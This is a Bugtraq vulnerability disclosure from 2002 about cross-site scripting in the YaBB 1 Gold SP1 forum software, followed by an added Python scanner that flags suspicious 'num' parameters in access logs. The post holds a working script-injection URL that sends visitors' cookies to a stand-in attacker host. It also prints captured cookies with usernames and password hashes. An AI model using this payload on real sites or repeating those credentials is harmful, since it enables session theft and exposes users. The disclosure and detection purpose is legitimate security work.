[28067] in bugtraq


Cross-site Scripting Vulnerability in YaBB 1 Gold - SP1!

daemon@ATHENA.MIT.EDU (=?iso-8859-1?q?Fabricio=20Angelett)
Mon Dec 2 12:33:12 2002

Message-ID: <20021202005901.2542.qmail@web11603.mail.yahoo.com>
Date: Sun, 1 Dec 2002 18:59:01 -0600 (CST)
From: Fabricio Angeletti <f_a_a@yahoo.com>
To: bugtraq@securityfocus.com
In-Reply-To: <200211272312.SAA01132@ebbets.poly.edu>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

 
http://the.target.xxx/board/YaBB.pl?board=gral;action=display;num=10360245269<Script>location%3d'Http://www.scriptkiddie.home/x.php?Cookie%3d'%2b(document.cookie)%3b</Script>

 num is a post that doesn't exist
 board must be a valid and accessible board
 x.php is a script to log the cookie

 That is an example of the cookie:
 268: YaBBusername=HellMind; YaBBpassword=yyG8B.3TA6i6I
 272: YaBBusername=Canallaman; YaBBpassword=yypZn/JbGHTNY

 Tested in YaBB 1 Gold - SP1!

 I discovered this just now. I know it isn't much, but you can
 steal the user's identity and maybe you can try to change
the password too (there is another old vuln but I don't
know if it works here)

 Sorry for my bad English

 Bye



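A detection check for the request pattern reported above, as an added example that is not part of the original message or of YaBB: it scans web-server access logs for YaBB.pl requests whose num parameter is not purely numeric after percent-decoding. The log lines are constructed, and the rule that legitimate num values contain only digits is an assumption.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (not from the original post).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Dec/2002:10:00:01 +0000] "GET /board/YaBB.pl?board=gral;action=display;num=1036024526 HTTP/1.0" 200 5120',
    '192.0.2.11 - - [02/Dec/2002:10:00:07 +0000] "GET /board/YaBB.pl?board=gral;action=display;num=10360245269%3CScript%3Ealert(1)%3C/Script%3E HTTP/1.0" 200 4096',
    '192.0.2.12 - - [02/Dec/2002:10:00:09 +0000] "GET /board/YaBB.pl?board=gral&action=display&num=77%253Cb%253E HTTP/1.0" 200 4096',
    '192.0.2.13 - - [02/Dec/2002:10:00:12 +0000] "GET /index.html?num=%3Cb%3E HTTP/1.0" 200 300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also normalised."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_num(line):
    """Return the decoded num value of a YaBB.pl request if it is not all digits, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/yabb.pl"):
        return None
    # YaBB separates parameters with ';' as in the reported URL; '&' is accepted too.
    for pair in re.split(r"[;&]", url.query):
        name, _, raw = pair.partition("=")
        if name == "num":
            value = fully_decode(raw)
            # Assumption: a legitimate post number contains ASCII digits only.
            if not re.fullmatch(r"[0-9]+", value):
                return value
    return None

def scan(lines):
    """Return (line index, decoded num value) for every flagged log line."""
    return [(i, v) for i, line in enumerate(lines) if (v := suspicious_num(line)) is not None]

if __name__ == "__main__":
    for index, value in scan(SAMPLE_LOG):
        print(f"line {index}: non-numeric num parameter: {value!r}")
```

The same digits-only rule can be enforced server-side before num is echoed into the page, together with HTML-escaping of any request value that is written back to the response.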
